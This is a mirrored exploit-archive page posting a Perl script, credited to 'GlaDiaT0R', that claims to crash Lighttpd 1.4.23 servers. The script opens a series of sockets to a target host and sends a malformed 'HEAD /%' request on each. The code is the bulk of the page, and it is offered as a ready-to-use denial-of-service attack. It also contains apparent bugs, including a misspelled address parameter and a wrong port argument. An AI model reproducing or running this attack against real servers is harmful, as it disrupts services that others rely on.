Home / os / win7

Lighttpd Server 1.4.23 Remote Denial of Service

Posted on 05 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Lighttpd Server 1.4.23 Remote Denial of Service</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================== Lighttpd Server 1.4.23 Remote Denial of Service =============================================== #!/usr/bin/perl # # Lighttpd Server 1.4.23 Remote Denial of Service # #AuThoR:GlaDiaT0R #Mail: The_gl4di4t0r[AT]hotmail.com use IO::Socket; print &quot;[+] Author : GlaDiaT0R &quot;; print &quot;[+] Mail : the_gl4di4t0r[AT]hotmail[DOT.com &quot;; print &quot;[+] Title : Lighttpd Server 1.4.x Remote Denial of Service &quot;; if (@ARGV &lt; 1) { print &quot;[-] Usage: &lt;nice.pl&gt; &lt;host&gt; &lt;port&gt; &quot;; print &quot;[-] Exemple: nice.pl 127.0.0.1 80 &quot;; exit; } $ip = $ARGV[0]; $port = $ARGV[1]; print &quot;[+] DOS... &quot;; for($i=0;$i&lt;20;$i++) { $socket = IO::Socket::INET-&gt;new( Port =&gt; &quot;tcp&quot;, ipadress =&gt; &quot;$ip&quot;, PeerPort =&gt; &quot;$port&quot;) || die &quot;[-] Failed &quot;; print $socket &quot;HEAD /% HTTP/1.0 &quot;; } print &quot;[+] Done successfully!! &quot;; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-05]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP